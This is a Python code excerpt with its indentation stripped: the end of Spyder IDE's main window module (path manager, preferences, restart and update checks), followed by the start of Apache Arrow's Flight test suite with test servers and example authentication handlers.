The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
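        # Note: paths are inserted at position 1 (not 0) so the first
        # sys.path entry is left untouched; iterating in reverse preserves
        # the configured order once all insertions are done.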
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
        # Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
@Slot()
def win_env(self):
"""Show Windows current user environment variables."""
self.dialog_manager.show(WinUserEnvDialog(self))
# --- Kite
def show_kite_installation(self):
"""Show installation dialog for Kite."""
self.completions.get_client('kite').show_installation_dialog()
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
            except Exception:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage'),
(self.clock_status, 'clock')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
# Update conda status widget
if is_anaconda() and self.conda_status:
interpreter = self.get_main_interpreter()
self.conda_status.update_interpreter(interpreter)
else:
return
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
dlg.setStyleSheet("QTabWidget::tab-bar {"
"alignment: left;}")
self.prefs_dialog_instance = dlg
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
widget = self.completions._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for completion_plugin in self.completions.clients.values():
completion_plugin = completion_plugin['plugin']
widget = completion_plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for plugin in [self.appearance,
self.run,
self.shortcuts,
self.workingdirectory,
self.editor,
self.projects,
self.ipyconsole,
self.historylog,
self.help,
self.variableexplorer,
self.onlinehelp,
self.explorer,
self.findinfiles] + self.thirdparty_plugins:
if plugin is not None:
# New API
if getattr(plugin, 'CONF_WIDGET_CLASS', None):
try:
widget = self.create_plugin_conf_widget(plugin)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
# Old API
try:
widget = plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
except AttributeError:
pass
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
else:
self.prefs_dialog_instance.show()
self.prefs_dialog_instance.activateWindow()
self.prefs_dialog_instance.raise_()
self.prefs_dialog_instance.setFocus()
def __preference_page_changed(self, index):
"""Preference page index has changed."""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
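        # Pick a free port and save it to the config, so that new Spyder
        # processes started with a file argument know where to send the
        # filename.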
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:  # Serve requests until the socket is closed
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
        Quit Spyder, reset it to its default settings and restart the
        application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
        Quit and restart the Spyder application.
        If *reset* is True, Spyder is reset to its default settings on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
repo_dir = osp.dirname(spyder_start_directory)
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join([repo_dir])
else:
env['PYTHONPATH'] = ':'.join([repo_dir])
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
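        # Quote the interpreter and restart script paths so the command
        # still works if either of them contains spaces.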
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
        # Note: The +6 pixels on the top make it look better
delta_top = (self.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
        # `feedback` = False is used on startup, so only positive feedback is
        # given. `feedback` = True is used after startup (when using the menu
        # action) and gives feedback whether updates are found or not.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
        # Provide feedback when clicking the menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
        Check for Spyder updates on GitHub releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
# --- Main interpreter
# ------------------------------------------------------------------------
def get_main_interpreter(self):
if CONF.get('main_interpreter', 'default'):
return sys.executable
else:
return CONF.get('main_interpreter', 'custom_interpreter')
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
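    # Note: these attributes only take effect if they are set on
    # QCoreApplication *before* the QApplication instance is created.
    # A minimal sketch of what a start-up script would do to force the
    # software OpenGL implementation (illustrative, not Spyder's actual code):
    #
    #     from qtpy.QtCore import QCoreApplication, Qt
    #     QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL, True)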
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
    # ----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
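            # Rebinding ``self`` below is a deliberate no-op: the base
            # QApplication.__init__ is never called, so no second Qt
            # application is created when third-party code instantiates
            # QApplication.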
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if sys.platform == "darwin":
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = initialize()
window = run_spyder(app, CLI_OPTIONS, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, argparse won't be able to exit if --help option is passed
options, args = (CLI_OPTIONS, CLI_ARGS)
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = initialize()
# **** Handle other options ****
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
        # Optimize (byte-compile) the whole Spyder source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = run_spyder(app, options, args)
else:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
test_flight.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ast
import base64
import os
import struct
import tempfile
import threading
import time
import traceback
import numpy as np
import pytest
import pyarrow as pa
from pyarrow.lib import tobytes
from pyarrow.util import pathlib, find_free_port
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing/data")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
CRITERIA = b"the expected criteria"
def __init__(self, location=None, options=None, **kwargs):
super().__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
self.options = options
def list_flights(self, context, criteria):
if criteria == self.CRITERIA:
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table, options=self.options)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table),
options=self.options)
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super().__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return [context.peer_identity(), context.peer().encode("utf-8")]
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
yield from self.expected_actions()
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super().__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
        assert data1[0].type != data2[0].type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return []
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
elif action.type == "protobuf":
err_msg = b'this is an error message'
raise flight.FlightUnauthorizedError("foo", err_msg)
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class ExchangeFlightServer(FlightServerBase):
"""A server for testing DoExchange."""
def __init__(self, options=None, **kwargs):
super().__init__(**kwargs)
self.options = options
def do_exchange(self, context, descriptor, reader, writer):
if descriptor.descriptor_type != flight.DescriptorType.CMD:
raise pa.ArrowInvalid("Must provide a command descriptor")
elif descriptor.command == b"echo":
return self.exchange_echo(context, reader, writer)
elif descriptor.command == b"get":
return self.exchange_do_get(context, reader, writer)
elif descriptor.command == b"put":
return self.exchange_do_put(context, reader, writer)
elif descriptor.command == b"transform":
return self.exchange_transform(context, reader, writer)
else:
raise pa.ArrowInvalid(
"Unknown command: {}".format(descriptor.command))
def exchange_do_get(self, context, reader, writer):
"""Emulate DoGet with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
writer.begin(data.schema)
writer.write_table(data)
def exchange_do_put(self, context, reader, writer):
"""Emulate DoPut with DoExchange."""
num_batches = 0
for chunk in reader:
if not chunk.data:
raise pa.ArrowInvalid("All chunks must have data.")
num_batches += 1
writer.write_metadata(str(num_batches).encode("utf-8"))
def exchange_echo(self, context, reader, writer):
"""Run a simple echo server."""
started = False
for chunk in reader:
if not started and chunk.data:
writer.begin(chunk.data.schema, options=self.options)
started = True
if chunk.app_metadata and chunk.data:
writer.write_with_metadata(chunk.data, chunk.app_metadata)
elif chunk.app_metadata:
writer.write_metadata(chunk.app_metadata)
elif chunk.data:
writer.write_batch(chunk.data)
else:
assert False, "Should not happen"
def exchange_transform(self, context, reader, writer):
"""Sum rows in an uploaded table."""
for field in reader.schema:
if not pa.types.is_integer(field.type):
raise pa.ArrowInvalid("Invalid field: " + repr(field))
table = reader.read_all()
sums = [0] * table.num_rows
for column in table:
for row, value in enumerate(column):
sums[row] += value.as_py()
result = pa.Table.from_arrays([pa.array(sums)], names=["sum"])
writer.begin(result.schema)
writer.write_table(result)
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
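        # Strip the b'secret:' prefix; the remaining bytes (the username) are
        # returned as the peer identity reported by context.peer_identity().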
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
